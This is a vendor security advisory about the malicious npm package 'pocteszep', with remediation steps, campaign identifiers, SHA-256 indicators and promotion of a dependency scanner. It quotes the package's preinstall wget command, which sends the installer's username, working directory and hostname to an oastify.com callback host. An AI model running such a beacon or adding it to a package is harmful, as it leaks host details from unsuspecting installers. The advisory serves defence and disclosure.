Which versions of pocteszep are malicious?

The following npm versions of pocteszep are flagged malicious: 1.0.0, 1.0.1, 1.0.2, 1.0.4, 1.0.5. Treat any of these as compromised.

How do I remediate pocteszep if I installed it?

Remove pocteszep from your project and lockfile, then assume any secrets accessible to the build or runtime were exposed: rotate API keys, tokens, and credentials, and audit for unexpected outbound network activity or persistence. Use O3 Security's dependency scanner to confirm the package and its artifacts are fully purged across your stack.

Is pocteszep part of a known attack campaign?

Yes — pocteszep is associated with the IN-MAL-2026-005379, IN-MAL-2026-005356, IN-MAL-2026-005380, IN-MAL-2026-005378, IN-MAL-2026-005366, IN-MAL-2026-005381, IN-MAL-2026-005355, IN-MAL-2026-005367 campaign. Packages in the same campaign often share infrastructure and payloads, so check whether any related packages are also in your dependency tree.

Can O3 Security detect pocteszep in my codebase?

Yes. O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, blocking pocteszep and packages like it before any post-install script runs.

Malicious package

pocteszepnpm

Malicious code in pocteszep (npm) Remove it immediately and rotate any exposed credentials.

MAL-2026-5544

Immediate action

Remove the package, then rotate any secrets the build/runtime could reach.

npm uninstall pocteszep

What this malware does

The package's npm preinstall lifecycle script runs wget --quiet "http://78dngdm3dhrrj8zgfm4es9m8bzhq5jt8.oastify.com/?user=$(whoami)&path=$(pwd)&hostname=$(hostname)" (package.json line 8). On npm install, before any code review, the installer's username, current working directory, and hostname are sent over plaintext HTTP to a Burp Collaborator (oastify.com) callback subdomain — a typical out-of-band exfiltration channel used in dependency-confusion attacks. The package description self-identifies as a 'Simple PoC package for testing for dependency confusion vulnerabilities,' and the package contains no legitimate functionality beyond the lifecycle beacon. Any installer pulling this package via name-collision with an internal dependency leaks host identity to the attacker.

The OpenSSF Package Analysis project identified 'pocteszep' @ 1.0.2 (npm) as malicious.

It is considered malicious because:

The package communicates with a domain associated with malicious activity.
The package executes one or more commands associated with malicious behavior.

Malicious versions

5 flagged

1.0.01.0.11.0.21.0.41.0.5

Indicators of compromise (SHA-256)

0928ae3dd121de41479d98b831bdff705eb1e0e5960a60863c22fc844749fdae

49e809bf95413ac0d2235c8a4abf33b3b2121af7e3b8fc2393e077c04ae28fdc

a469c97969991b78ee0e28cc8e4a43d14750da0d4e3d4519f6e21263c9143a8f

c146870dfd2759e9e7b37a0c37783c40dbc35ebbf4e2145c1763dacc0b1d9e9f

c559e1ff2e96350c1eb7bc1c091c250b5860a7712fa7b99bbfb8762910190af7

e13c609971d69e4699c85f451f163c7ab60ebb775171211fbd20d880b0ef2a2d

f0ba0d9e403509d779b0247843e7f8994a4caae4b7fe43f41192ff708a07d4cf

1724503cde62bd3c17ba606fd752f088dfb2b1c41ae612ef5074f93e9896ee00

384556848b90af0dc3c06aef498f7c87a97a47c2491454a572ac1a79b197bd14

Frequently asked questions

No. pocteszep on npm has been identified as a malicious package (versions 1.0.0, 1.0.1, 1.0.2, 1.0.4, 1.0.5 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-005379IN-MAL-2026-005356IN-MAL-2026-005380IN-MAL-2026-005378IN-MAL-2026-005366IN-MAL-2026-005381IN-MAL-2026-005355IN-MAL-2026-005367

References

Credits

Amazon Inspector · finder
OpenSSF: Package Analysis · finder

Scan your dependencies

O3 Security blocks malicious packages like this at install time and in CI.

Supply-chain protection